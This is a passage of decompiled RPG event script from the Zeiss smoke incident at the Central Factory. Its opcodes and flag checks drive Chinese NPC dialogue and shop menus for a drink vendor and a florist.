Function_8_130E end def Function_9_1332(): pass label("Function_9_1332") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_1355") OP_8D(0xFE, -26510, 46520, -19100, 49060, 3000) Jump("Function_9_1332") label("loc_1355") Return() # Function_9_1332 end def Function_10_1356(): pass label("Function_10_1356") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_1379") OP_8D(0xFE, -23960, 59250, -21170, 66410, 3000) Jump("Function_10_1356") label("loc_1379") Return() # Function_10_1356 end def Function_11_137A(): pass label("Function_11_137A") Return() # Function_11_137A end def Function_12_137B(): pass label("Function_12_137B") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_13DC") ChrTalk( 0xFE, ( "#690F这烟真是好大啊。\x02\x03", "连中央工房的换气能力\x01", "也应付不过来……\x02", ) ) CloseMessageWindow() label("loc_13DC") TalkEnd(0xFE) Return() # Function_12_137B end def Function_13_13E0(): pass label("Function_13_13E0") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1441") ChrTalk( 0xFE, ( "啊，\x01", "好久没有这么拼命地奔跑了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "啊啊，真糟糕。\x01", "情况糟透了。\x02", ) ) CloseMessageWindow() label("loc_1441") TalkEnd(0xFE) Return() # Function_13_13E0 end def Function_14_1445(): pass label("Function_14_1445") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_14A7") ChrTalk( 0xFE, ( "工房里面\x01", "已经到处是浓烟了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "呼呼～～～～\x01", "我还以为死定了呢。\x02", ) ) CloseMessageWindow() label("loc_14A7") TalkEnd(0xFE) Return() # Function_14_1445 end def Function_15_14AB(): pass label("Function_15_14AB") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_14EE") ChrTalk( 0xFE, "有没有受伤的人？\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果有的话\x01", "要马上通知我啊。\x02", ) ) CloseMessageWindow() label("loc_14EE") TalkEnd(0xFE) Return() # Function_15_14AB end def Function_16_14F2(): pass label("Function_16_14F2") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1548") ChrTalk( 0xFE, ( "前、前辈！\x01", "怎么办呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "发生火灾的话，\x01", "研究数据就要毁掉了！\x02", ) ) CloseMessageWindow() label("loc_1548") TalkEnd(0xFE) Return() # Function_16_14F2 end def Function_17_154C(): pass label("Function_17_154C") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_15EC") ChrTalk( 0xFE, "……呼，好奇怪。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "无论怎么看\x01", "都不像火灾所冒出的烟啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过，\x01", "大家也都没有能冒烟的实验装置。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "那么这些烟\x01", "是从哪里出来的？\x02", ) ) CloseMessageWindow() label("loc_15EC") TalkEnd(0xFE) Return() # Function_17_154C end def Function_18_15F0(): pass label("Function_18_15F0") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1672") ChrTalk( 0xFE, ( "我都不清楚\x01", "自己是怎么逃出来的……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "在逃生的途中\x01", "我突然想起了空贼事件……\x01", "脚差点踩空了。\x02", ) ) CloseMessageWindow() label("loc_1672") TalkEnd(0xFE) Return() # Function_18_15F0 end def Function_19_1676(): pass label("Function_19_1676") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_17AA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 2)), scpexpr(EXPR_END)), "loc_1721") ChrTalk( 0xFE, ( "说起来\x01", "的确没有看到拉赛尔呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过那家伙应该不用让人担心。\x01", "肯定已经逃出来了。\x02", ) ) CloseMessageWindow() Jump("loc_17A7") label("loc_1721") OP_A2(0xA) ChrTalk( 0xFE, ( "呼，\x01", "紧急通道也是很有用处的嘛。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "没那玩意儿的话\x01", "就只能从阳台上跳下来了。\x02", ) ) CloseMessageWindow() label("loc_17A7") Jump("loc_17F4") label("loc_17AA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_17F4") ChrTalk( 0xFE, "痛、痛痛痛……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "不小心踏空楼梯，\x01", "扭到腰了。\x02", ) ) CloseMessageWindow() label("loc_17F4") TalkEnd(0xFE) Return() # Function_19_1676 end def Function_20_17F8(): pass label("Function_20_17F8") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_18AC") ChrTalk( 0xFE, ( "我正在做实验的时候，\x01", "突然冒起了漫天烟雾……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不管怎么说，\x01", "我是拼命逃出来了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "我想大家也\x01", "应该都逃出来了吧……\x02", ) ) CloseMessageWindow() label("loc_18AC") TalkEnd(0xFE) Return() # Function_20_17F8 end def Function_21_18B0(): pass label("Function_21_18B0") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_18CD") OP_22(0x192, 0x0, 0x64) ChrTalk( 0xFE, "喵呀～噢！\x02", ) CloseMessageWindow() label("loc_18CD") TalkEnd(0xFE) Return() # Function_21_18B0 end def Function_22_18D1(): pass label("Function_22_18D1") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_END)), "loc_1B82") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 5)), scpexpr(EXPR_END)), "loc_1951") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天还是早点回家吧。\x01", "不管再发生什么我都要回家。\x02", ) ) CloseMessageWindow() Jump("loc_1B7F") label("loc_1951") Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x30, 0x0, 0x10)"), scpexpr(EXPR_END)), "loc_19D1") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天还是早点回家吧。\x01", "不管再发生什么我都要回家。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) Jump("loc_1B7F") label("loc_19D1") Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x2D, 0x0, 0x4)"), scpexpr(EXPR_END)), "loc_1A6C") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "……唔，这种情况下\x01", "还是不要谈工作的事了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "真是不好意思，\x01", "明天再把书给我吧。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) Jump("loc_1B7F") label("loc_1A6C") Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x2D, 0x0, 0x2)"), scpexpr(EXPR_END)), "loc_1B08") ChrTalk( 0xFE, ( "呼，建筑物里都是烟，\x01", "好讨厌呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "……唔，这种情况下\x01", "还是不要谈工作的事了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "委托的事\x01", "只好拖到明天了。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) Jump("loc_1B7F") label("loc_1B08") ChrTalk( 0xFE, ( "呼，因为刚才拼命地跑，\x01", "身上的肌肉痛得受不了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天还是早点回家吧。\x01", "不管再发生什么我都要回家。\x02", ) ) CloseMessageWindow() OP_A2(0x1D) label("loc_1B7F") Jump("loc_1BD4") label("loc_1B82") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1BD4") ChrTalk( 0xFE, ( "唉，\x01", "好久没有这样剧烈运动过了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "哎呀哎呀，痛啊……\x02", ) CloseMessageWindow() label("loc_1BD4") TalkEnd(0xFE) Return() # Function_22_18D1 end def Function_23_1BD8(): pass label("Function_23_1BD8") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1C78") ChrTalk( 0x9, ( "#800F博士应该在三楼的工作室。\x01", "　\x02\x03", "首先去那里确认一下。\x01", "如果危险的话就马上撤离。\x02", ) ) CloseMessageWindow() label("loc_1C78") TalkEnd(0xFE) Return() # Function_23_1BD8 end def Function_24_1C7C(): pass label("Function_24_1C7C") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1CEA") ChrTalk( 0x8, ( "#150F我也想一起去呀。\x01", "但没办法了……\x02\x03", "小艾你们千万要小心呀。\x01", "　\x02", ) ) CloseMessageWindow() label("loc_1CEA") TalkEnd(0xFE) Return() # Function_24_1C7C end def Function_25_1CEE(): pass label("Function_25_1CEE") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1D4B") ChrTalk( 0xFE, ( "客、客人，\x01", "你们都顺利逃出来了啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "这、这烟也太大了。\x02", ) CloseMessageWindow() label("loc_1D4B") TalkEnd(0xFE) Return() # Function_25_1CEE end def Function_26_1D4F(): pass label("Function_26_1D4F") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1DC8") ChrTalk( 0xFE, ( "哪里都找不到\x01", "拉赛尔博士啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "说不定……\x01", "难道还在工房里面吗……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "啊，该怎么办才好。\x02", ) CloseMessageWindow() label("loc_1DC8") TalkEnd(0xFE) Return() # Function_26_1D4F end def Function_27_1DCC(): pass label("Function_27_1DCC") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1DEF") ChrTalk( 0xFE, "鲁迪，你没事吧？\x02", ) CloseMessageWindow() label("loc_1DEF") TalkEnd(0xFE) Return() # Function_27_1DCC end def Function_28_1DF3(): pass label("Function_28_1DF3") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1E57") ChrTalk( 0xFE, "咳咳、咳咳。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "烟、烟……\x01", "咳咳、咳咳咳、咳咳。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "肺、肺……\x01", "咳咳、咳咳！\x02", ) ) CloseMessageWindow() label("loc_1E57") TalkEnd(0xFE) Return() # Function_28_1DF3 end def Function_29_1E5B(): pass label("Function_29_1E5B") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_1F46") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 5)), scpexpr(EXPR_END)), "loc_1EE1") ChrTalk( 0xFE, ( "不过……\x01", "那些从里面出来的\x01", "穿着军装的家伙是谁呀？\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "明明那么大的烟，\x01", "他们却好像一点事也没有。\x02", ) ) CloseMessageWindow() Jump("loc_1F43") label("loc_1EE1") OP_A2(0xD) ChrTalk( 0xFE, ( "中央工房\x01", "开始冒烟的时候，\x01", "我可紧张坏了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "呼，都怪这烟，\x01", "喉咙又开始渴了。\x02", ) ) CloseMessageWindow() label("loc_1F43") Jump("loc_2035") label("loc_1F46") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_1F85") ChrTalk( 0xFE, "啊啊啊，怎么会这样！\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "到、到底\x01", "发生什么事情了。\x02", ) ) CloseMessageWindow() Jump("loc_2035") label("loc_1F85") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_2035") ChrTalk( 0xFE, ( "在整个王国中，\x01", "穿着作业服的驾驶员也只有我一个了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过，这和衣服没有关系，\x01", "关键在于技术。\x02", ) ) CloseMessageWindow() label("loc_2035") TalkEnd(0xFE) Return() # Function_29_1E5B end def Function_30_2039(): pass label("Function_30_2039") TalkBegin(0x18) FadeToDark(300, 0, 100) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Menu( 0, 10, 100, 1, ( "对话\x01", # 0 "买东西\x01", # 1 "离开\x01", # 2 ) ) MenuEnd(0x0) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_5F(0x0) FadeToBright(300, 0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_2099") OP_0D() OP_A9(0x4D) OP_56(0x0) TalkEnd(0x18) Return() label("loc_2099") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_20AA") TalkEnd(0x18) Return() label("loc_20AA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 4)), scpexpr(EXPR_END)), "loc_2126") ChrTalk( 0x18, ( "军队的警备飞艇\x01", "好像停在港口呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "又没有发生什么事件，\x01", "实在是很少见呢。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_2126") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_221B") ChrTalk( 0x18, "哟，辛苦了。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "前些日子，\x01", "进出工房船的人好频繁呢，\x01", "不过这两天又恢复平静了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "今天的飞艇坪\x01", "从早上开始就很安静。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_221B") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_22FA") ChrTalk( 0x18, "哟，你们今天也很忙嘛。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "说到忙，\x01", "刚才雷曼那家伙\x01", "慌张地跑向飞艇坪了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "看来很着急\x01", "要出动工房船的样子。\x01", "他还真是辛苦呢。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_22FA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 1)), scpexpr(EXPR_END)), "loc_2367") ChrTalk( 0x18, "哟，早上好。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "早上最好还是\x01", "喝杯营养丰富的饮料。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_2367") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAA, 0)), scpexpr(EXPR_END)), "loc_241E") ChrTalk( 0x18, "哟，这么晚还在辛苦工作啊。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "哎呀哎呀，\x01", "今天也累得要命。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "差不多该关店了，\x01", "想要什么就快点选吧。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_241E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2532") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_24AA") ChrTalk( 0x18, ( "从中央工房出来的\x01", "穿蓝色军装的家伙，\x01", "到底是什么人啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "不知道那些军人\x01", "在工房里面干了些什么。\x02", ) ) CloseMessageWindow() Jump("loc_252F") label("loc_24AA") OP_A2(0xB) ChrTalk( 0x18, ( "呼～\x01", "看来骚动总算结束了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "说起来，那些军人\x01", "在那么浓重的烟雾里干了什么呢。\x02", ) ) CloseMessageWindow() label("loc_252F") Jump("loc_2934") label("loc_2532") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_259A") ChrTalk( 0x18, ( "这、这种时候\x01", "必须冷静地行动！\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "那么，\x01", "大家请先喝点清凉的饮料，\x01", "稍微冷静一下吧。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_259A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_26B9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_2632") ChrTalk( 0x18, ( "那边的雷曼\x01", "其实是飞艇的驾驶员。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "我说的飞艇\x01", "不是定期船而是工房船。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "嗯，\x01", "反正都是在天上飞的家伙啦。\x02", ) ) CloseMessageWindow() Jump("loc_26B6") label("loc_2632") OP_A2(0xB) ChrTalk( 0x18, ( "那边的雷曼\x01", "怎么看都是个维修员吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "不过，\x01", "其实他是飞艇的驾驶员哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "哈哈哈～\x01", "真是人不可貌相啊。\x02", ) ) CloseMessageWindow() label("loc_26B6") Jump("loc_2934") label("loc_26B9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 3)), scpexpr(EXPR_END)), "loc_27FB") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_2772") ChrTalk( 0x18, ( "做生意不只是买卖商品，\x01", "还必须要考虑经营的手段。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "想开间有人情味的店，\x01", "嘴上说起来简单，\x01", "但是实现起来却很难呢。\x02", ) ) CloseMessageWindow() Jump("loc_27F8") label("loc_2772") OP_A2(0xB) ChrTalk( 0x18, ( "我们的愿望是\x01", "拥有一间属于我们自己的店子，\x01", "就算规模很小也好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "可以的话，最好能开间\x01", "像这座城里的『贝尔杂货店』\x01", "那样有人情味的小店。\x02", ) ) CloseMessageWindow() label("loc_27F8") Jump("loc_2934") label("loc_27FB") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 1)), scpexpr(EXPR_END)), "loc_2876") ChrTalk( 0x18, ( "对面卖花的爱玲\x01", "是我的妹妹。\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "如果可以的话，\x01", "希望大家也到那边去看看。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_2876") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 2)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2934") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1, 3)), scpexpr(EXPR_END)), "loc_28E1") ChrTalk( 0x18, ( "要不要喝点\x01", "清凉的饮料呀？\x02", ) ) CloseMessageWindow() ChrTalk( 0x18, ( "我这里卖的饮料不仅美味，\x01", "对身体也很有益哦。\x02", ) ) CloseMessageWindow() Jump("loc_2934") label("loc_28E1") OP_A2(0xB) ChrTalk( 0x18, "哟，辛苦了。\x02", ) CloseMessageWindow() ChrTalk( 0x18, ( "要不要喝点\x01", "清凉的饮料呀？\x02", ) ) CloseMessageWindow() label("loc_2934") TalkEnd(0x18) Return() # Function_30_2039 end def Function_31_2938(): pass label("Function_31_2938") TalkBegin(0x19) FadeToDark(300, 0, 100) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Menu( 0, 10, 100, 1, ( "对话\x01", # 0 "买东西\x01", # 1 "离开\x01", # 2 ) ) MenuEnd(0x0) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_5F(0x0) FadeToBright(300, 0) Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_2998") OP_0D() OP_A9(0x4E) OP_56(0x0) TalkEnd(0x19) Return() label("loc_2998") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_29A9") TalkEnd(0x19) Return() label("loc_29A9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 4)), scpexpr(EXPR_END)), "loc_2A09") ChrTalk( 0x19, ( "哎，从飞艇坪那边\x01", "传来了汽笛的声音……\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, "……发生什么事了？\x02", ) CloseMessageWindow() Jump("loc_2D99") label("loc_2A09") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_2A89") ChrTalk( 0x19, ( "来，请看一看。\x01", "这里卖的都是很漂亮的花哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "忘记讨厌的事，\x01", "买一盆来舒缓心情吧。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2A89") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_2B1A") ChrTalk( 0x19, ( "啊，客人们都在议论最近的事情，\x01", "没人来好好欣赏花了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "毕竟发生了那样的事情……\x01", "不过我还是觉得有些寂寞呢。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2B1A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 1)), scpexpr(EXPR_END)), "loc_2B59") ChrTalk( 0x19, "啊，早上好。\x02", ) CloseMessageWindow() ChrTalk( 0x19, ( "请随意看吧。\x01", "就算是只闻闻花香\x01", "也能让你心情愉快的。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2B59") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAA, 0)), scpexpr(EXPR_END)), "loc_2BA4") ChrTalk( 0x19, "啊，晚上好。\x02", ) CloseMessageWindow() ChrTalk( 0x19, ( "虽然马上要关店了，\x01", "不过趁现在挑选鲜花也没关系。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2BA4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2C34") ChrTalk( 0x19, ( "我正想着烟可能快要散了，\x01", "工房里就出来了几位军人。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "难道是他们\x01", "把烟止住的吗？\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2C34") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_2C53") ChrTalk( 0x19, ( "不、不好了！\x01", "怎么回事！？\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2C53") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_2CC2") ChrTalk( 0x19, ( "蔡斯城里的绿色\x01", "越来越少了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "就算一次也好，\x01", "好想去参观一下那个\x01", "以花闻名的玛诺利亚村啊。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2CC2") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 1)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2D40") ChrTalk( 0x19, ( "那边卖饮料的\x01", "是我的哥哥哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x19, ( "我们的梦想是兄妹一起加油，\x01", "将来开间属于自己的店子。\x02", ) ) CloseMessageWindow() Jump("loc_2D99") label("loc_2D40") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 2)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2D99") ChrTalk( 0x19, "欢迎光临～\x02", ) CloseMessageWindow() ChrTalk( 0x19, ( "这里有各种漂亮的鲜花，\x01", "请各位客人慢慢观赏。\x02", ) ) CloseMessageWindow() label("loc_2D99") TalkEnd(0x19) Return() # Function_31_2938 end def Function_32_2D9D(): pass label("Function_32_2D9D") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2E42") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 6)), scpexpr(EXPR_END)), "loc_2DF3") ChrTalk( 0xFE, "呼……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "喝了点饮料，\x01", "终于放松下来了。\x02", ) ) CloseMessageWindow() Jump("loc_2E42") label("loc_2DF3") OP_A2(0x6) ChrTalk( 0xFE, "呼……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "这个案件真是让人震惊啊。\x01", "没办法安心回去工作了。\x02", ) ) CloseMessageWindow() label("loc_2E42") TalkEnd(0xFE) Return() # Function_32_2D9D end def Function_33_2E46(): pass label("Function_33_2E46") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_2F84") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 7)), scpexpr(EXPR_END)), "loc_2EEF") ChrTalk( 0xFE, ( "你们没事实在是太好了，\x01", "不过没看到拉赛尔呀。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "虽然如果他没事的时候\x01", "就会给别人带来各种各样的麻烦，\x01", "不过还是有点担心他啊……\x02", ) ) CloseMessageWindow() Jump("loc_2F84") label("loc_2EEF") OP_A2(0x7) ChrTalk( 0xFE, ( "哦哦，伊格尔。\x01", "你没受伤真是太好了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "是从紧急楼梯下来的吗？\x01", "想必一定很累吧。\x02", ) ) CloseMessageWindow() label("loc_2F84") TalkEnd(0xFE) Return() # Function_33_2E46 end def Function_34_2F88(): pass label("Function_34_2F88") TalkBegin(0xFE) TalkEnd(0xFE) Return() # Function_34_2F88 end def Function_35_2F8F(): pass label("Function_35_2F8F") 